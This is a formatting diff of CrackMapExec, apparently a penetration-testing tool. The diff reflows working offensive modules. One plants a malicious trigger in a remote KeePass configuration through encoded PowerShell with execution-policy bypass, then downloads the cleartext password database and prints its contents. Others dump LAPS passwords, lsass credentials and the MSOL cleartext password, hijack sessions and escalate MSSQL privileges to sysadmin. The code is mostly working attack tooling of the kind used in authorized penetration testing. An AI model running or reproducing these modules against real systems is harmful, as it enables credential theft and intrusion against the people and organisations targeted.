"ALL", ]: - context.log.fail( - "Unrecognized action, use --options to list available parameters" - ) + context.log.fail("Unrecognized action, use --options to list available parameters") exit(1) else: self.action = module_options["ACTION"] else: - context.log.fail( - "Missing ACTION option, use --options to list available parameters" - ) + context.log.fail("Missing ACTION option, use --options to list available parameters") exit(1) if "KEEPASS_CONFIG_PATH" in module_options: @@ -133,9 +119,7 @@ class CMEModule: if "PSH_EXEC_METHOD" in module_options: if module_options["PSH_EXEC_METHOD"] not in ["ENCODE", "PS1"]: - context.log.fail( - "Unrecognized powershell execution method, use --options to list available parameters" - ) + context.log.fail("Unrecognized powershell execution method, use --options to list available parameters") exit(1) else: self.powershell_exec_method = module_options["PSH_EXEC_METHOD"] @@ -160,54 +144,34 @@ class CMEModule: # check if the specified KeePass configuration file exists if self.trigger_added(context, connection): - context.log.display( - f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping" - ) + context.log.display(f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping") return - context.log.display( - f"Adding trigger '{self.trigger_name}' to '{self.keepass_config_path}'" - ) + context.log.display(f"Adding trigger '{self.trigger_name}' to '{self.keepass_config_path}'") # prepare the trigger addition script based on user-specified parameters (e.g: trigger name, etc) # see data/keepass_trigger_module/AddKeePassTrigger.ps1 for the full script - self.add_trigger_script_str = self.add_trigger_script_str.replace( - "REPLACE_ME_ExportPath", self.export_path - ) - self.add_trigger_script_str = self.add_trigger_script_str.replace( - "REPLACE_ME_ExportName", self.export_name - ) - self.add_trigger_script_str = self.add_trigger_script_str.replace( - "REPLACE_ME_TriggerName", self.trigger_name - ) - self.add_trigger_script_str = self.add_trigger_script_str.replace( - "REPLACE_ME_KeePassXMLPath", self.keepass_config_path - ) + self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportPath", self.export_path) + self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportName", self.export_name) + self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name) + self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path) # add the malicious trigger to the remote KeePass configuration file if self.powershell_exec_method == "ENCODE": - add_trigger_script_b64 = b64encode( - self.add_trigger_script_str.encode("UTF-16LE") - ).decode("utf-8") + add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode("UTF-16LE")).decode("utf-8") add_trigger_script_cmd = f"powershell.exe -e {add_trigger_script_b64}" connection.execute(add_trigger_script_cmd) - sleep( - 2 - ) # as I noticed some delay may happen with the encoded powershell command execution + sleep(2) # as I noticed some delay may happen with the encoded powershell command execution elif self.powershell_exec_method == "PS1": try: - self.put_file_execute_delete( - context, connection, self.add_trigger_script_str - ) + self.put_file_execute_delete(context, connection, self.add_trigger_script_str) except Exception as e: context.log.fail(f"Error while adding malicious trigger to file: {e}") sys.exit(1) # checks if the malicious trigger was effectively added to the specified KeePass configuration file if self.trigger_added(context, connection): - context.log.success( - f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files" - ) + context.log.success(f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files") else: context.log.fail(f"Unknown error when adding malicious trigger to file") sys.exit(1) @@ -216,13 +180,9 @@ class CMEModule: """check if the trigger is added to the config file XML tree""" if self.trigger_added(context, connection): - context.log.display( - f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'" - ) + context.log.display(f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'") else: - context.log.display( - f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}'" - ) + context.log.display(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}'") def restart(self, context, connection): """Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1 @@ -231,13 +191,9 @@ class CMEModule: # search for keepass processes search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"' - search_keepass_process_output_csv = connection.execute( - search_keepass_process_command_str, True - ) + search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True) # we return the powershell command as a CSV for easier column parsing - csv_reader = reader( - search_keepass_process_output_csv.split("\n"), delimiter="," - ) + csv_reader = reader(search_keepass_process_output_csv.split("\n"), delimiter=",") next(csv_reader) # to skip the header line keepass_process_list = list(csv_reader) # check if multiple processes belonging to different users are running (in order to choose which one to restart) @@ -249,64 +205,40 @@ class CMEModule: return elif len(keepass_users) == 1: # if there is only 1 KeePass process running # if KEEPASS_USER option is specified then we check if the user matches - if self.keepass_user and ( - keepass_users[0] != self.keepass_user - and keepass_users[0].split("\\")[1] != self.keepass_user - ): - context.log.fail( - f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart" - ) + if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split("\\")[1] != self.keepass_user): + context.log.fail(f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart") return else: self.keepass_user = keepass_users[0] elif len(keepass_users) > 1 and self.keepass_user: found_user = False # we search through every KeePass process owner for the specified user for user in keepass_users: - if ( - user == self.keepass_user - or user.split("\\")[1] == self.keepass_user - ): + if user == self.keepass_user or user.split("\\")[1] == self.keepass_user: self.keepass_user = keepass_users[0] found_user = True if not found_user: - context.log.fail( - f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart" - ) + context.log.fail(f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart") return else: - context.log.fail( - "Multiple KeePass processes were found, please specify parameter USER to target one" - ) + context.log.fail("Multiple KeePass processes were found, please specify parameter USER to target one") return context.log.display("Restarting {}'s KeePass process".format(keepass_users[0])) # prepare the restarting script based on user-specified parameters (e.g: keepass user, etc) # see data/keepass_trigger_module/RestartKeePass.ps1 - self.restart_keepass_script_str = self.restart_keepass_script_str.replace( - "REPLACE_ME_KeePassUser", self.keepass_user - ) - self.restart_keepass_script_str = self.restart_keepass_script_str.replace( - "REPLACE_ME_KeePassBinaryPath", self.keepass_binary_path - ) - self.restart_keepass_script_str = self.restart_keepass_script_str.replace( - "REPLACE_ME_DummyServiceName", self.dummy_service_name - ) + self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassUser", self.keepass_user) + self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassBinaryPath", self.keepass_binary_path) + self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_DummyServiceName", self.dummy_service_name) # actually performs the restart on the remote target if self.powershell_exec_method == "ENCODE": - restart_keepass_script_b64 = b64encode( - self.restart_keepass_script_str.encode("UTF-16LE") - ).decode("utf-8") - restart_keepass_script_cmd = "powershell.exe -e {}".format( - restart_keepass_script_b64 - ) + restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode("UTF-16LE")).decode("utf-8") + restart_keepass_script_cmd = "powershell.exe -e {}".format(restart_keepass_script_b64) connection.execute(restart_keepass_script_cmd) elif self.powershell_exec_method == "PS1": try: - self.put_file_execute_delete( - context, connection, self.restart_keepass_script_str - ) + self.put_file_execute_delete(context, connection, self.restart_keepass_script_str) except Exception as e: context.log.fail("Error while restarting KeePass: {}".format(e)) return @@ -315,28 +247,18 @@ class CMEModule: """Search for the cleartext database export file in the specified export folder (until found, or manually exited by the user)""" found = False - context.log.display( - f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient" - ) - context.log.display( - "we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything" - ) + context.log.display(f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient") + context.log.display("we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything") # if the specified path is %APPDATA%, we need to check in every user's folder if self.export_path == "%APPDATA%" or self.export_path == "%appdata%": - poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format( - self.export_name - ) + poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name) else: export_full_path = f"'{self.export_path}\\{self.export_name}'" - poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format( - export_full_path, export_full_path - ) + poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path) # we poll every X seconds until the export path is found on the remote machine while not found: - poll_exports_command_output = connection.execute( - poll_export_command_str, True - ) + poll_exports_command_output = connection.execute(poll_export_command_str, True) if self.export_name not in poll_exports_command_output: print(".", end="", flush=True) sleep(self.poll_frequency_seconds) @@ -346,119 +268,73 @@ class CMEModule: # once a database is found, downloads it to the attackers machine context.log.success("Found database export !") # in case multiple exports found (may happen if several users exported the database to their APPDATA) - for count, export_path in enumerate( - poll_exports_command_output.split("\r\n") - ): + for count, export_path in enumerate(poll_exports_command_output.split("\r\n")): try: buffer = BytesIO() - connection.conn.getFile( - self.share, export_path.split(":")[1], buffer.write - ) + connection.conn.getFile(self.share, export_path.split(":")[1], buffer.write) # if multiple exports found, add a number at the end of local path to prevent override if count > 0: - local_full_path = ( - self.local_export_path - + "/" - + self.export_name.split(".")[0] - + "_" - + str(count) - + "." - + self.export_name.split(".")[1] - ) + local_full_path = self.local_export_path + "/" + self.export_name.split(".")[0] + "_" + str(count) + "." + self.export_name.split(".")[1] else: - local_full_path = ( - self.local_export_path + "/" + self.export_name - ) + local_full_path = self.local_export_path + "/" + self.export_name # downloads the exported database with open(local_full_path, "wb") as f: f.write(buffer.getbuffer()) - remove_export_command_str = "powershell.exe Remove-Item {}".format( - export_path - ) + remove_export_command_str = "powershell.exe Remove-Item {}".format(export_path) connection.execute(remove_export_command_str, True) - context.log.success( - 'Moved remote "{}" to local "{}"'.format( - export_path, local_full_path - ) - ) + context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path)) found = True except Exception as e: - context.log.fail( - "Error while polling export files, exiting : {}".format(e) - ) + context.log.fail("Error while polling export files, exiting : {}".format(e)) def clean(self, context, connection): """Checks for database export + malicious trigger on the remote host, removes everything""" # if the specified path is %APPDATA%, we need to check in every user's folder if self.export_path == "%APPDATA%" or self.export_path == "%appdata%": - poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format( - self.export_name - ) + poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name) else: export_full_path = f"'{self.export_path}\\{self.export_name}'" - poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format( - export_full_path, export_full_path - ) + poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path) poll_export_command_output = connection.execute(poll_export_command_str, True) # deletes every export found on the remote machine if self.export_name in poll_export_command_output: # in case multiple exports found (may happen if several users exported the database to their APPDATA) for export_path in poll_export_command_output.split("\r\n"): - context.log.display( - f"Database export found in '{export_path}', removing" - ) + context.log.display(f"Database export found in '{export_path}', removing") remove_export_command_str = f"powershell.exe Remove-Item {export_path}" connection.execute(remove_export_command_str, True) else: - context.log.display( - f"No export found in {self.export_path} , everything is cleaned" - ) + context.log.display(f"No export found in {self.export_path} , everything is cleaned") # if the malicious trigger was not self-deleted, deletes it if self.trigger_added(context, connection): # prepare the trigger deletion script based on user-specified parameters (e.g: trigger name, etc) # see data/keepass_trigger_module/RemoveKeePassTrigger.ps1 - self.remove_trigger_script_str = self.remove_trigger_script_str.replace( - "REPLACE_ME_KeePassXMLPath", self.keepass_config_path - ) - self.remove_trigger_script_str = self.remove_trigger_script_str.replace( - "REPLACE_ME_TriggerName", self.trigger_name - ) + self.remove_trigger_script_str = self.remove_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path) + self.remove_trigger_script_str = self.remove_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name) # actually performs trigger deletion if self.powershell_exec_method == "ENCODE": - remove_trigger_script_b64 = b64encode( - self.remove_trigger_script_str.encode("UTF-16LE") - ).decode("utf-8") - remove_trigger_script_command_str = ( - f"powershell.exe -e {remove_trigger_script_b64}" - ) + remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode("UTF-16LE")).decode("utf-8") + remove_trigger_script_command_str = f"powershell.exe -e {remove_trigger_script_b64}" connection.execute(remove_trigger_script_command_str, True) elif self.powershell_exec_method == "PS1": try: - self.put_file_execute_delete( - context, connection, self.remove_trigger_script_str - ) + self.put_file_execute_delete(context, connection, self.remove_trigger_script_str) except Exception as e: context.log.fail(f"Error while deleting trigger, exiting: {e}") sys.exit(1) # check if the specified KeePass configuration file does not contain the malicious trigger anymore if self.trigger_added(context, connection): - context.log.fail( - f"Unknown error while removing trigger '{self.trigger_name}', exiting" - ) + context.log.fail(f"Unknown error while removing trigger '{self.trigger_name}', exiting") else: - context.log.display( - f"Found trigger '{self.trigger_name}' in configuration file, removing" - ) + context.log.display(f"Found trigger '{self.trigger_name}' in configuration file, removing") else: - context.log.success( - f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}', skipping" - ) + context.log.success(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}', skipping") def all_in_one(self, context, connection): """Performs ADD, RESTART, POLL and CLEAN actions one after the other""" @@ -484,27 +360,19 @@ class CMEModule: try: buffer = BytesIO() - connection.conn.getFile( - self.share, self.keepass_config_path.split(":")[1], buffer.write - ) + connection.conn.getFile(self.share, self.keepass_config_path.split(":")[1], buffer.write) except Exception as e: - context.log.fail( - f"Error while getting file '{self.keepass_config_path}', exiting: {e}" - ) + context.log.fail(f"Error while getting file '{self.keepass_config_path}', exiting: {e}") sys.exit(1) try: keepass_config_xml_root = ElementTree.fromstring(buffer.getvalue()) except Exception as e: - context.log.fail( - f"Error while parsing file '{self.keepass_config_path}', exiting: {e}" - ) + context.log.fail(f"Error while parsing file '{self.keepass_config_path}', exiting: {e}") sys.exit(1) # check if the specified KeePass configuration file does not already contain the malicious trigger - for trigger in keepass_config_xml_root.findall( - ".//Application/TriggerSystem/Triggers/Trigger" - ): + for trigger in keepass_config_xml_root.findall(".//Application/TriggerSystem/Triggers/Trigger"): if trigger.find("Name").text == self.trigger_name: return True @@ -513,16 +381,10 @@ class CMEModule: def put_file_execute_delete(self, context, connection, psh_script_str): """Helper to upload script to a temporary folder, run then deletes it""" script_str_io = StringIO(psh_script_str) - connection.conn.putFile( - self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read - ) - script_execute_cmd = "powershell.exe -ep Bypass -F {}".format( - self.remote_temp_script_path - ) + connection.conn.putFile(self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read) + script_execute_cmd = "powershell.exe -ep Bypass -F {}".format(self.remote_temp_script_path) connection.execute(script_execute_cmd, True) - remove_remote_temp_script_cmd = 'powershell.exe "Remove-Item "{}""'.format( - self.remote_temp_script_path - ) + remove_remote_temp_script_cmd = 'powershell.exe "Remove-Item "{}""'.format(self.remote_temp_script_path) connection.execute(remove_remote_temp_script_cmd) def extract_password(self, context): @@ -538,15 +400,9 @@ class CMEModule: for obj2 in obj["KeePassFile"]["Root"]["Group"]["Entry"]: for password in obj2["String"]: if password["Key"] == "Password": - context.log.highlight( - str(password["Key"]) - + " : " - + str(password["Value"]["#text"]) - ) + context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"])) else: - context.log.highlight( - str(password["Key"]) + " : " + str(password["Value"]) - ) + context.log.highlight(str(password["Key"]) + " : " + str(password["Value"])) context.log.highlight("") if len(obj["KeePassFile"]["Root"]["Group"]["Group"]): for obj2 in obj["KeePassFile"]["Root"]["Group"]["Group"]: @@ -554,17 +410,9 @@ class CMEModule: for obj3 in obj2["Entry"]: for password in obj3["String"]: if password["Key"] == "Password": - context.log.highlight( - str(password["Key"]) - + " : " - + str(password["Value"]["#text"]) - ) + context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"])) else: - context.log.highlight( - str(password["Key"]) - + " : " - + str(password["Value"]) - ) + context.log.highlight(str(password["Key"]) + " : " + str(password["Value"])) context.log.highlight("") except KeyError: pass diff --git a/cme/modules/laps.py b/cme/modules/laps.py index 6bb49735..4329f771 100644 --- a/cme/modules/laps.py +++ b/cme/modules/laps.py @@ -33,11 +33,7 @@ class CMEModule: def on_login(self, context, connection): context.log.display("Getting LAPS Passwords") if self.computer is not None: - searchFilter = ( - "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" - + self.computer - + "))" - ) + searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.computer + "))" else: searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*)))" attributes = [ @@ -47,46 +43,27 @@ class CMEModule: "sAMAccountName", ] results = connection.search(searchFilter, attributes, 0) - results = [ - r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry) - ] + results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)] if len(results) != 0: laps_computers = [] for computer in results: msMCSAdmPwd = "" sAMAccountName = "" - values = { - str(attr["type"]).lower(): str(attr["vals"][0]) - for attr in computer["attributes"] - } + values = {str(attr["type"]).lower(): str(attr["vals"][0]) for attr in computer["attributes"]} if "mslaps-encryptedpassword" in values: - context.log.fail( - "LAPS password is encrypted and currently CrackMapExec doesn't" - " support the decryption..." - ) + context.log.fail("LAPS password is encrypted and currently CrackMapExec doesn't" " support the decryption...") return elif "mslaps-password" in values: r = json.loads(values["mslaps-password"]) laps_computers.append((values["samaccountname"], r["n"], r["p"])) elif "ms-mcs-admpwd" in values: - laps_computers.append( - (values["samaccountname"], "", values["ms-mcs-admpwd"]) - ) + laps_computers.append((values["samaccountname"], "", values["ms-mcs-admpwd"])) else: - context.log.fail( - "No result found with attribute ms-MCS-AdmPwd or" - " msLAPS-Password" - ) + context.log.fail("No result found with attribute ms-MCS-AdmPwd or" " msLAPS-Password") laps_computers = sorted(laps_computers, key=lambda x: x[0]) for sAMAccountName, user, msMCSAdmPwd in laps_computers: - context.log.highlight( - "Computer: {:<20} User: {:<15} Password: {}".format( - sAMAccountName, user, msMCSAdmPwd - ) - ) + context.log.highlight("Computer: {:<20} User: {:<15} Password: {}".format(sAMAccountName, user, msMCSAdmPwd)) else: - context.log.fail( - "No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !" - ) + context.log.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !") diff --git a/cme/modules/ldap-checker.py b/cme/modules/ldap-checker.py index 94d2bb36..501151c7 100644 --- a/cme/modules/ldap-checker.py +++ b/cme/modules/ldap-checker.py @@ -22,9 +22,7 @@ class CMEModule: """ name = "ldap-checker" - description = ( - "Checks whether LDAP signing and binding are required and / or enforced" - ) + description = "Checks whether LDAP signing and binding are required and / or enforced" supported_protocols = ["ldap"] opsec_safe = True multiple_hosts = True @@ -53,9 +51,7 @@ class CMEModule: def run_ldaps_noEPA(inputUser, inputPassword, dcTarget): try: tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2) - ldapServer = ldap3.Server( - dcTarget, use_ssl=True, port=636, get_info=ldap3.ALL, tls=tls - ) + ldapServer = ldap3.Server(dcTarget, use_ssl=True, port=636, get_info=ldap3.ALL, tls=tls) ldapConn = ldap3.Connection( ldapServer, user=inputUser, @@ -75,10 +71,7 @@ class CMEModule: exit() except Exception as e: context.log.fail("\n [!] " + dcTarget + " -", str(e)) - context.log.fail( - " * Ensure DNS is resolving properly, and that you can reach" - " LDAPS on this host" - ) + context.log.fail(" * Ensure DNS is resolving properly, and that you can reach" " LDAPS on this host") # Conduct a bind to LDAPS with channel binding supported # but intentionally miscalculated. In the case that and @@ -147,9 +140,7 @@ class CMEModule: ssl_sock.close() return False else: - context.log.fail( - "Unexpected error during LDAPS handshake: " + str(e) - ) + context.log.fail("Unexpected error during LDAPS handshake: " + str(e)) ssl_sock.close() return False @@ -157,9 +148,7 @@ class CMEModule: # requirements are enforced based on potential errors # during the bind attempt. def run_ldap(inputUser, inputPassword, dcTarget): - ldapServer = ldap3.Server( - dcTarget, use_ssl=False, port=389, get_info=ldap3.ALL - ) + ldapServer = ldap3.Server(dcTarget, use_ssl=False, port=389, get_info=ldap3.ALL) ldapConn = ldap3.Connection( ldapServer, user=inputUser, @@ -176,9 +165,7 @@ class CMEModule: context.log.debug("UNEXPECTED ERROR: " + str(ldapConn.result)) else: # LDAPS bind successful - return ( - False # because LDAP server signing requirements are not enforced - ) + return False # because LDAP server signing requirements are not enforced exit() # Run trough all our code blocks to determine LDAP signing and channel binding settings. @@ -190,23 +177,11 @@ class CMEModule: elif ldapIsProtected == True: context.log.fail("LDAP Signing IS Enforced") if DoesLdapsCompleteHandshake(dcTarget) == True: - ldapsChannelBindingAlwaysCheck = run_ldaps_noEPA( - inputUser, inputPassword, dcTarget - ) - ldapsChannelBindingWhenSupportedCheck = asyncio.run( - run_ldaps_withEPA(inputUser, inputPassword, dcTarget) - ) - if ( - ldapsChannelBindingAlwaysCheck == False - and ldapsChannelBindingWhenSupportedCheck == True - ): - context.log.highlight( - 'LDAPS Channel Binding is set to "When Supported"' - ) - elif ( - ldapsChannelBindingAlwaysCheck == False - and ldapsChannelBindingWhenSupportedCheck == False - ): + ldapsChannelBindingAlwaysCheck = run_ldaps_noEPA(inputUser, inputPassword, dcTarget) + ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(inputUser, inputPassword, dcTarget)) + if ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == True: + context.log.highlight('LDAPS Channel Binding is set to "When Supported"') + elif ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == False: context.log.highlight('LDAPS Channel Binding is set to "NEVER"') elif ldapsChannelBindingAlwaysCheck == True: context.log.fail('LDAPS Channel Binding is set to "Required"') @@ -214,7 +189,4 @@ class CMEModule: context.log.fail("\nSomething went wrong...") exit() else: - context.log.fail( - dcTarget - + " - cannot complete TLS handshake, cert likely not configured" - ) + context.log.fail(dcTarget + " - cannot complete TLS handshake, cert likely not configured") diff --git a/cme/modules/lsassy_dump.py b/cme/modules/lsassy_dump.py index 47f73d18..4571f7a5 100644 --- a/cme/modules/lsassy_dump.py +++ b/cme/modules/lsassy_dump.py @@ -18,9 +18,7 @@ class CMEModule: name = "lsassy" description = "Dump lsass and parse the result remotely with lsassy" supported_protocols = ["smb"] - opsec_safe = ( - True # writes temporary files, and it's possible for them to not be deleted - ) + opsec_safe = True # writes temporary files, and it's possible for them to not be deleted multiple_hosts = True def __init__(self, context=None, module_options=None): @@ -85,13 +83,9 @@ class CMEModule: if deleted_file: context.log.debug(f"Deleted dumper file") else: - context.log.fail( - f"[OPSEC] No exception, but failed to delete file: {file_path}" - ) + context.log.fail(f"[OPSEC] No exception, but failed to delete file: {file_path}") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting temporary lsassy dumper file {file_path}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting temporary lsassy dumper file {file_path}: {e}") if credentials is None: credentials = [] @@ -100,13 +94,7 @@ class CMEModule: c = cred.get_object() context.log.debug(f"Cred: {c}") - credentials = [ - cred.get_object() - for cred in credentials - if cred.ticket is None - and cred.masterkey is None - and not cred.get_username().endswith("$") - ] + credentials = [cred.get_object() for cred in credentials if cred.ticket is None and cred.masterkey is None and not cred.get_username().endswith("$")] credentials_unique = [] credentials_output = [] context.log.debug(f"Credentials: {credentials}") @@ -141,10 +129,7 @@ class CMEModule: domain = None for cred in credentials: domain = cred["domain"] - if ( - "." not in cred["domain"] - and cred["domain"].upper() in connection.domain.upper() - ): + if "." not in cred["domain"] and cred["domain"].upper() in connection.domain.upper(): domain = connection.domain # slim shady self.save_credentials( context, @@ -163,9 +148,7 @@ class CMEModule: cred["lmhash"], cred["nthash"], ) - credz_bh.append( - {"username": cred["username"].upper(), "domain": domain.upper()} - ) + credz_bh.append({"username": cred["username"].upper(), "domain": domain.upper()}) add_user_bh(credz_bh, domain, context.log, connection.config) @staticmethod @@ -176,15 +159,11 @@ class CMEModule: context.log.highlight(output) @staticmethod - def save_credentials( - context, connection, domain, username, password, lmhash, nthash - ): + def save_credentials(context, connection, domain, username, password, lmhash, nthash): host_id = context.db.get_hosts(connection.host)[0][0] if password is not None: credential_type = "plaintext" else: credential_type = "hash" password = ":".join(h for h in [lmhash, nthash] if h is not None) - context.db.add_credential( - credential_type, domain, username, password, pillaged_from=host_id - ) + context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id) diff --git a/cme/modules/masky.py b/cme/modules/masky.py index 8c297100..c6d510b2 100644 --- a/cme/modules/masky.py +++ b/cme/modules/masky.py @@ -40,9 +40,7 @@ class CMEModule: def on_admin_login(self, context, connection): if not self.ca: - context.log.fail( - "Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)" - ) + context.log.fail("Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)") return False host = connection.host @@ -78,9 +76,7 @@ class CMEModule: if not tracker.nb_hijacked_users: context.log.display("No users' sessions were hijacked") else: - context.log.display( - f"{tracker.nb_hijacked_users} session(s) successfully hijacked" - ) + context.log.display(f"{tracker.nb_hijacked_users} session(s) successfully hijacked") context.log.display("Attempting to retrieve NT hash(es) via PKINIT") if not rslts: @@ -96,9 +92,7 @@ class CMEModule: if pwned_users: context.log.success(f"{pwned_users} NT hash(es) successfully collected") else: - context.log.fail( - "Unable to collect NT hash(es) from the hijacked session(s)" - ) + context.log.fail("Unable to collect NT hash(es) from the hijacked session(s)") return True def process_credentials(self, connection, context, user): @@ -121,17 +115,10 @@ class CMEModule: if not tracker.files_cleaning_success: context.log.fail("Fail to clean files related to Masky") - context.log.fail( - ( - f"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', " - f"'{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\Windows\\Temp\\'" - ) - ) + context.log.fail((f"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', " f"'{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\Windows\\Temp\\'")) ret = False if not tracker.svc_cleaning_success: - context.log.fail( - f"Fail to remove the service named '{tracker.svc_name}', please remove it manually" - ) + context.log.fail(f"Fail to remove the service named '{tracker.svc_name}', please remove it manually") ret = False return ret diff --git a/cme/modules/ms17-010.py b/cme/modules/ms17-010.py index 3c98cd9c..86728dd7 100644 --- a/cme/modules/ms17-010.py +++ b/cme/modules/ms17-010.py @@ -22,9 +22,7 @@ class CMEModule: def on_login(self, context, connection): if check(connection.host): context.log.highlight("VULNERABLE") - context.log.highlight( - "Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/" - ) + context.log.highlight("Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/") class SMB_HEADER(Structure): diff --git a/cme/modules/msol.py b/cme/modules/msol.py index 194aa5a4..7fa5606c 100644 --- a/cme/modules/msol.py +++ b/cme/modules/msol.py @@ -8,9 +8,7 @@ from cme.helpers.powershell import get_ps_script class CMEModule: name = "msol" - description = ( - "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server" - ) + description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = True @@ -65,9 +63,7 @@ class CMEModule: context.log.display(f"Uploading {self.msol}") with open(file_to_upload, "rb") as msol: try: - connection.conn.putFile( - self.share, f"{self.tmp_share}{self.msol}", msol.read - ) + connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read) context.log.success(f"Msol script successfully uploaded") except Exception as e: context.log.fail(f"Error writing file to share {self.tmp_share}: {e}") @@ -89,6 +85,4 @@ class CMEModule: connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}") context.log.success(f"Msol script successfully deleted") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting msol script on {self.share}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}") diff --git a/cme/modules/mssql_priv.py b/cme/modules/mssql_priv.py index 9d0d969a..58265721 100644 --- a/cme/modules/mssql_priv.py +++ b/cme/modules/mssql_priv.py @@ -92,12 +92,7 @@ class CMEModule: elif target_user.dbowner: self.do_dbowner_privesc(target_user.dbowner, exec_as) if self.is_admin_user(self.current_username): - self.context.log.success( - f"{self.current_username} is now a sysadmin! " - + highlight( - "({})".format(self.context.conf.get("CME", "pwn3d_label")) - ) - ) + self.context.log.success(f"{self.current_username} is now a sysadmin! " + highlight("({})".format(self.context.conf.get("CME", "pwn3d_label")))) def build_exec_as_from_path(self, target_user): path = [target_user.username] @@ -118,20 